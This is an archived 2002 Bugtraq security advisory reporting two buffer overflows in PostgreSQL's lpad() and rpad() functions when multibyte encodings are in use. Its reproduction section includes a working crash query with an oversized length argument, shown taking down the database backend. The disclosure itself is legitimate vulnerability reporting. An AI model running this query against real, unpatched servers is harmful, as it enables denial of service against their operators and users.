@(#)Mordred Labs advisory 0x0004: Multiple buffer overflows in PostgreSQL.

From: Sir Mordred The Traitor (mordred@s-mail.com)
Date: 08/20/02

Previous message: Sir Mordred The Traitor: "@(#)Mordred Labs advisory 0x0003: Buffer overflow in PostgreSQL"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Tue, 20 Aug 2002 15:01:34 +0000
From: Sir Mordred The Traitor <mordred@s-mail.com>
To: bugtraq@securityfocus.com

//@(#) Mordred Labs advisory 0x0004

Release data: 20/08/02
Name: Two buffer overflows in PostgreSQL
Versions affected: all versions
Conditions: multibyte support
Risk: average

--[ Description:

I guess all of you already hear about the PostgreSQL.
If not, try to visit
http://www.postgresql.org/idocs/index.php?preface.html#INTRO-WHATIS.

There are two buffer overflows in src/backend/utils/adt/oracle_compat.c.
1) lpad(text, integer, text) function
2) rpad(text, integer, text) function

--[ Details:

The code for this functions is
src/backend/utils/adt/oracle_compat.c::lpad() and
src/backend/utils/adt/oracle_compat.c::rpad() respectively.
The code suffers from a buffer overflow (of course).

--[ How to reproduce:

shell> pgsql template1 postgres
template1=# select version();
version
-----------------------------------------------------------
PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96
(1 row)

template1=# create database my_db with encoding='UNICODE';
CREATE DATABASE
template1# \c my_db
You are now connected to database my_db.

my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy');
pqReadData() -- backend closed the channel unexpectedly.
This probably means the backend terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!#

The same for rpad() function.

The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE,
MULE_INTERNAL.

--[ Solution

Secure coding of web applications, input validation checks...etc...

________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com/inf/en

Previous message: Sir Mordred The Traitor: "@(#)Mordred Labs advisory 0x0003: Buffer overflow in PostgreSQL"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[UNIX] Buffer Overflow in PostgreSQLs lpad() and rpad()
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PostgreSQL is "an advanced object-relational ... database management system that supports an extended subset of the SQL ... shell> pgsql template1 postgres ...
(Securiteam)
Re: Windows Ada database support.
... >>for example) promote the use of Object IDs (basically Row IDs). ... >>Still others don't support the concept at all (MySQL). ... >>within certain database design restrictions). ... PostgreSQL uses an API that opens/creates etc. and returns ...
(comp.lang.ada)
Running queries on large data structure
... the money) that parses multiple large text files containing nested data ... data from the PostgreSQL database by different criteria. ... Networks ...
(comp.lang.python)
Re: PHP + PostgreSQL
... >database from a program running on the same machine, ... ...again) hold the main rule of this techtables web apps. ... 2-3 - PostgreSQL ... you should have passwords on the various accounts. ...
(Debian-User)
Re: Access and Postgresql
... end on the same machine that is hosting the Postgresql program. ... If you have a split Access database with back-end (tables, data, and ... relationships) on the server, and the front-end (queries, forms, reports, ... the fact is they are _hoping_ that it is some other software interfering ...
(comp.databases.ms-access)